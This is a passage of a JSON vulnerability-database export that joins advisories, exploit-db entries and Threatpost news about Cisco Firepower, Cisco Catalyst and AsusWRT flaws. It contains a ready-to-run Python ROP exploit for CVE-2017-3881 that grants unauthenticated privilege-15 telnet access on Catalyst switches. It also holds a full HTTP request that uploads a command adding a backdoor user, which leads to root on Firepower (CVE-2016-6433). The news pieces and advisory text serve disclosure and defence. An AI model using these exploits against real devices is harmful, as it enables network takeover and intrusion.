Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\nGecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data;\nboundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\";\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or\ndirectory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\nKoreLogic, Inc.\n\n6. Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description\n\n\nThe contents of this advisory are copyright(c) 2016\nKoreLogic, Inc. and are licensed under a Creative Commons\nAttribution Share-Alike 4.0 (United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a\nproven track record of providing security services to entities\nranging from Fortune 500 to small and mid-sized companies. We\nare a highly skilled team of senior security consultants doing\nby-hand security assessments for the most important networks in\nthe U.S. and around the world. We are also developers of various\ntools and resources aimed at helping the security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:08", "description": "\nCisco Catalyst 2960 IOS 12.2(55)SE11 - ROCEM Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "exploitpack", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE11 - ROCEM Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "EXPLOITPACK:E524B474934E6F9E393D9F5424380DCC", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow\n# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\n# Date: 04.10.2017\n# Exploit Author: https://twitter.com/artkond\n# Vendor Homepage: https://www.cisco.com/\n# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)\n# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11\n# CVE : CVE-2017-3881\n# Description:\n#\n# The exploit connects to the Catalyst switch and patches\n# it execution flow to allow credless telnet interaction \n# with highest privilege level\n#\n\n\nimport socket\nimport sys\nfrom time import sleep\n\nset_credless = True\n\nif len(sys.argv) < 3:\n\tprint sys.argv[0] + ' [host] --set/--unset'\n\tsys.exit()\nelif sys.argv[2] == '--unset':\n\tset_credless = False\nelif sys.argv[2] == '--set':\n\tpass\nelse:\n\tprint sys.argv[0] + ' [host] --set/--unset'\n\tsys.exit()\n\n\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], 23))\n\nprint '[+] Connection OK'\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\nprint '[+] Sending cluster option'\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\n\n\n\npayload = '\\xff\\xfa\\x24\\x00'\npayload += '\\x03CISCO_KITS\\x012:'\npayload += 'A' * 116\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\n#next bytes are shown as offsets from r1\npayload += '\\x02\\x3d\\x55\\xdc'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\nif set_credless is True:\n\tpayload += '\\x00\\x00\\x99\\x9c'\t# +12 set address of func that rets 1\nelse:\n\tpayload +=\t'\\x00\\x04\\xeA\\xe0'\t# unset \npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\npayload += '\\x00\\xe1\\xa9\\xf4' \t\t# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\npayload += 'CCCC'\t\t\t\t\t# +8 \npayload += 'DDDD'\t\t\t\t\t# +12\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\npayload += '\\x00\\x06\\x7b\\x5c'\t\t# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \npayload += '\\x02\\x3d\\x55\\xc8'\t\t# +8 r1+8 = 0x23d55c8\npayload += 'FFFF'\t\t\t\t\t# +12 \npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \npayload += '\\x00\\x6c\\xb3\\xa0' \t\t# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\nif set_credless:\n\tpayload += '\\x00\\x27\\x0b\\x94'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; \nelse:\n\tpayload += '\\x00\\x04\\xe7\\x78'\t# unset\npayload += 'HHHH'\t\t\t\t\t# +12\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\npayload += '\\x01\\x4a\\xcf\\x98'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\npayload += 'KKKK'\t\t\t\t\t# +12\npayload += 'LLLL'\t\t\t\t\t# +16\npayload += '\\x01\\x14\\xe7\\xec'\t\t# +20 original execution flow return addr\npayload += ':15:' + '\\xff\\xf0'\n\ns.send(payload)\n\nprint '[+] All done'\n\ns.close()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:51", "description": "ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that when combined give a local unauthenticated attacker the ability to execute commands as root on targeted devices.\n\nRouters models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company\u2019s router lines.\n\n\u201cThe attack is done from the LAN side the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,\u201d according to network security firm Beyond Security, that disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). \u201cThis (attack) works for someone in the your LAN \u2013 even if they are on a guest network \u2013 and it may lead to remote command execution.\u201d\n\nThe two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw.\n\n\u201cDue to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,\u201d [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>) who discovered the flaw.\n\nThe first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via \u201chandle_request()\u201d which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.\n\n\u201cThis can (and will) be combined with other vulnerabilities to achieve remote code execution,\u201d he said.\n\nRibeiro describes the second bug (CVE-2018-6000 ) as an unauthorized configuration change flaw tied to the router\u2019s nonvolatile random access memory module (NVRAM).\n\n\u201cBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,\u201d he said.\n\nAccording to Ribeiro\u2019s technical write up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want.\n\n\u201cOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH,\u201d he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.\n\nThe attack scenario can be varied, such as abusing ASUS\u2019 own service called \u201cinfosvr\u201d that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr services has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).\n\nThe vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company\u2019s SecuriTeam Secure Disclosure program.\n\nAccording to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.\n\nA complete list of affected routers, according to ASUS, include:\n\nRT-AC88U 3.0.0.4.384_10007\n\nRT-AC3100 3.0.0.4.384_10007\n\nRT-AC86U 3.0.0.4.384_10007\n\nRT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U\n\nRT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1\n", "cvss3": {}, "published": "2018-01-25T18:40:03", "type": "threatpost", "title": "ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-25T18:40:03", "id": "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "href": "https://threatpost.com/asus-patches-root-command-execution-flaws-haunting-over-a-dozen-router-models/129666/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Cisco Systems warned customers on Friday of a critical vulnerability that could allow an attacker to execute arbitrary code and obtain full control on more than 300 different models of its switches and routers. Cisco said it became aware of the vulnerability after WikiLeaks released its Vault 7 cache of documents that revealed the existence of covert tools allegedly used by the U.S. Central Intelligence Agency.\n\nCisco said there is currently no patch or workaround for the vulnerability that affects software that runs its Cisco Cluster Management Protocol (CMP) processing code that runs in the company\u2019s Cisco IOS and Cisco IOS XE software.\n\n\u201cThis vulnerability was found during the analysis of documents related to the Vault 7 disclosure,\u201d wrote Cisco [in its security bulletin](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). It said it was unaware of any \u201cpublic announcements or malicious use of the vulnerability.\u201d\n\nEarlier this month, WikiLeaks released more than 8,000 documents referred to as the Vault 7 leak that describe secret methods allegedly used by the CIA\u2019s Center for Cyber Intelligence to penetrate everything from cellphones and televisions, to enterprise hardware. According to WikiLeaks the release of the documents is the first of several. The documents described many alleged vulnerabilities, but WikiLeaks did not released any of the tools or exploits associated with the disclosures.\n\nThe Cisco flaw ([CVE-2017-3881](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881>)) affects more than 300 Cisco products including its Cisco Catalyst Blade Switch hardware used in Dell, IBM and HP Enterprise equipment.\n\nAccording to Cisco, the vulnerability is tied to two factors related to how the CMP utilizes Telnet internally as a signaling and command protocol between cluster members. Cisco said the first relates to a vulnerability in the Cisco CMP processing code in Cisco IOS and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to \u201ccause a reload of an affected device or remotely execute code with elevated privileges.\u201d\n\nThe second, according to Cisco, is tied to the incorrect processing of malformed CMP-specific Telnet options.\n\n\u201cIn terms of mitigations to consider, disabling the Telnet protocol as an allowed protocol for incoming connections would eliminate the exploit vector. Disabling Telnet and using SSH is recommended by Cisco,\u201d [wrote Omar Santos](<http://blogs.cisco.com/security/the-wikileaks-vault-7-leak-what-we-know-so-far>), principal engineer, with Cisco Product Security Incident Response Team, in a blog post. \u201cCustomers unable or unwilling to disable the Telnet protocol can reduce the attack surface by implementing infrastructure access control lists.\u201d\n\nCisco notes that the flaw impacts the default configuration of affected switches. It said hardware running Cisco IOS XE is vulnerable when \u201cthe CMP subsystem is present on the Cisco IOS XE software image running on the device, and the device is configured to accept incoming Telnet connections.\u201d\n\nSantos said the scope of Cisco\u2019s mitigation efforts was limited due to the fact none of the Vault 7 tools and malware referenced by WikiLeaks have been disclosed. \u201cAn ongoing investigation and focused analysis of the areas of code that are alluded to in the disclosure is underway. Until more information is available, there is little Cisco can do at this time from a vulnerability handling perspective,\u201d he wrote.\n\nFor his part, WikiLeaks\u2019 Julian Assange has offered to provide vendors with details on the vulnerabilities at a later date.\n\n\u201cTelnet was first developed in 1969, long before the birth of the internet, so it\u2019s easy to see why it would still have many unknown vulnerabilities,\u201d said Phil Neray, vice president of industrial cybersecurity at CyberX. \u201cSince cyberattackers can easily scan the internet for exposed Cisco servers using open source tools, we could see (adversaries) exploiting this newly discovered vulnerability either to create massive DDoS botnets or to snoop on traffic after gaining full control of the router.\u201d\n\nNeray said that this most recent vulnerability should serve as a wakeup call for the industry to phase out Telnet entirely and find more modern ways of remotely managing their devices.\n\nAccording to Cisco\u2019s analysis of the vulnerability, based on WikiLeak documents, malware that targets its hardware exhibits a range of capabilities that include: \u201cdata collection, data exfiltration, command execution with administrative privileges (and without any logging of such commands ever been executed), HTML traffic redirection, manipulation and modification (insertion of HTML code on web pages), DNS poisoning, covert tunneling and others.\u201d\n\nThat analysis also concluded malware authors have gone to great lengths to remain hidden post infection from forensic analysis. \u201cIt would also seem the malware author spends a significant amount of resources on quality assurance testing \u2013 in order, it seems, to make sure that once installed the malware will not cause the device to crash or misbehave,\u201d Santos wrote.\n", "cvss3": {}, "published": "2017-03-20T13:20:41", "type": "threatpost", "title": "Cisco Warns of Critical Vulnerability Revealed in WikiLeaks 'Vault 7' Data Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-03-20T17:21:05", "id": "THREATPOST:E9751CD9F9151AD294951F327FB466C8", "href": "https://threatpost.com/cisco-warns-of-critical-vulnerability-revealed-in-vault-7-data-dump/124414/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:42", "description": "Cisco released an update this week that addresses a vulnerability in software running in more than 300 of its switches. The flaw was disclosed among the WikiLeaks Vault 7 dump of alleged CIA offensive hacking tools, and proof-of-concept exploit code exists that targets the vulnerability.\n\nCisco said the vulnerability was in the Cluster Management Protocol (CMP) processing code running in its IOS and IOS XE software, the company\u2019s longstanding networking operating system. In an advisory, Cisco cautioned that attackers could remotely execute code with elevated privileges, or cause a vulnerable switch or networking device to reload.\n\nCisco acknowledged the vulnerability, CVE-2017-3881, shortly after [investigating the WikiLeaks dump](<https://threatpost.com/cisco-warns-of-critical-vulnerability-revealed-in-vault-7-data-dump/124414/>). Attackers could abuse the code\u2019s use of telnet in the software to access a switch and gain full control. Cisco said CMP uses telnet as a signaling and command protocol between devices in a cluster. It conceded that it failed to properly restrict the use of CMP-specific telnet to only internal communication, and that the code incorrectly processed malformed CMP telnet options.\n\n\u201cAn attacker could exploit this vulnerability by sending malformed CMP-specific telnet options while establishing a telnet session with an affected Cisco device configured to accept telnet connections,\u201d Cisco said in its [advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). \u201cAn exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.\u201d\n\nCisco published a long list of switches from its Catalyst product line, as well as Cisco Embedded Service, IE 2000-5000, ME, RF and SM-X models. The switches are vulnerable, Cisco said, only if its CMP subsystem is present and running on IOS XE and the device is configured to accept telnet connections. This, Cisco said, is the default configuration.\n\nThe Vault 7 leaks began in March when WikiLeaks released more than 8,000 documents that describe secret methods allegedly used by the CIA\u2019s Center for Cyber Intelligence to penetrate everything from cellphones and televisions, to enterprise hardware. The documents described many alleged vulnerabilities, but WikiLeaks did not released any of the tools or exploits associated with the disclosures.\n\nThat was the first of several Vault 7 leaks, and was followed up two weeks later with a cache of documents and information indicating the CIA had the capability to [track iPhone users](<https://threatpost.com/wikileaks-dump-shows-cia-interdiction-of-iphone-supply-chain/124540/>) and had at its disposal malware implants for Apple firmware running on Macbooks.\n\nThe so-called Dark Matter release also included documentation for a tracking beacon that could be implanted on factory-fresh iPhones. The agency also concentrated on developing malware and exploits that would attack firmware running on Macs and iPhones, specifically EFI and UEFI firmware, giving it persistence on a target\u2019s device.\n", "cvss3": {}, "published": "2017-05-10T10:10:35", "type": "threatpost", "title": "Cisco Patches IOS XE Vulnerability Leaked in Vault 7 Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-05-10T14:10:35", "id": "THREATPOST:D91525C573A8C64689DAD91F6F0E4484", "href": "https://threatpost.com/cisco-patches-ios-xe-vulnerability-leaked-in-vault-7-dump/125568/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-27T11:47:22", "description": "Cisco has rushed out patches for a critical vulnerability in its ASR 9000 routers that could give remote, unauthenticated attackers access to the devices \u2013 as well as the power to launch denial-of-service (DoS) attacks against them.\n\nThe flaw is specifically in Cisco Aggregation Services Routers (ASR) 9000 Series, Cisco\u2019s popular carrier Ethernet [router](<https://www.cisco.com/c/en/us/products/routers/asr-9000-series-aggregation-services-routers/index.html>) intended for service applications. The vulnerability could allow an unauthenticated, remote attacker to access internal applications on the sysadmin virtual machine for the router, according to a Wednesday advisory.\n\n\u201cAn attacker could exploit this vulnerability by connecting to one of the listening internal applications,\u201d the [advisory stated](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190417-asr9k-exr>). \u201cA successful exploit could result in unstable conditions, including both a denial of service and remote unauthenticated access to the device.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2019-1710](<https://nvd.nist.gov/vuln/detail/CVE-2019-1710>)) has a CVSS score of 9.8, making it critical in severity.\n\nSpecifically, Cisco ASR 9000 routers have an issue where the internal sysadmin applications are incorrectly isolated in the secondary management interface. ASR 9000 routers that are running Cisco IOS XR 64-bit software and that have the secondary management interface are impacted.\n\nThat means an attacker could exploit this vulnerability by connecting to one of the listening internal applications. A successful exploit could result in unstable conditions, including both DoS and remote unauthenticated access to the device.\n\nCisco said that the vulnerability was discovered during internal security testing, and that it is not aware of any exploits.\n\n[![Cisco ASR 9000 Routers](https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/18083038/ASR-router--300x173.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/18083038/ASR-router-.png>)\n\nCisco ASR 9000 Routers\n\nCisco has urged users to upgrade to the Cisco IOS XR 64-bit software as soon as possible: \u201cThis vulnerability has been fixed in Cisco IOS XR 64-bit Software Release 6.5.3 and 7.0.1, which will edit the calvados_boostrap.cfg file and reload the device,\u201d it said.\n\nCisco on Wednesday also revealed that exploit code for a previously-disclosed critical remote code execution vulnerability was now available. The critical flaw (CVE-2017-3881) was previously disclosed in March 2017 and exists in the Cisco Cluster Management Protocol used in Cisco IOS and IOS XE software.\n\n\u201cA vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges,\u201d according to Cisco.\n\nCisco has released patches for the flaw \u2013 but the exploit code was made available by a security researcher on April 10, according to [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>).\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\n[Earlier in April](<https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/>), Cisco re-patched flaws for two high-severity bugs affecting its RV320 and RV325 routers after a botched first attempt at fixing them. The company also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-18T13:04:33", "type": "threatpost", "title": "Cisco Patches Critical Flaw In ASR 9000 Routers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881", "CVE-2019-1710", "CVE-2020-10245"], "modified": "2019-04-18T13:04:33", "id": "THREATPOST:280E7DBF7FC18A42CA8004ED97B61008", "href": "https://threatpost.com/cisco-patch-asr-9000-routers/143895/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-25T18:25:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T00:00:00", "type": "exploitdb", "title": "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2018-5999", "2018-6000", "CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EDB-ID:43881", "href": "https://www.exploit-db.com/exploits/43881", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\r\n\r\n\r\n>> Background and summary\r\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\r\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\r\n\r\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\r\n\r\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: HTTP server authentication bypass\r\nCVE-2018-5999\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\r\nIn AsusWRT_source/router/httpd/httpd.c:\r\n\r\nhandle_request(void)\r\n{\r\n...\r\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\r\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\r\n\r\n\tif (auth_result != 0) <--- auth fails\r\n\t{\r\n\t\tif(strcasecmp(method, \"post\") == 0){\r\n\t\t\tif (handler->input) {\r\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\r\n\t\t\t}\r\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\r\n\t\t}\r\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\r\n\t\treturn;\r\n\t}\r\n...\r\n}\r\n\r\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\r\n\r\n\r\n#2\r\nVulnerability: Unauthorised configuration change (NVRAM value setting)\r\nCVE-2018-6000\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\r\nIn AsusWRT_source/router/httpd/web.c:\r\n\r\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\r\n{\r\n...\r\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\r\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\r\n\t\t\tbreak;\r\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\toffset = 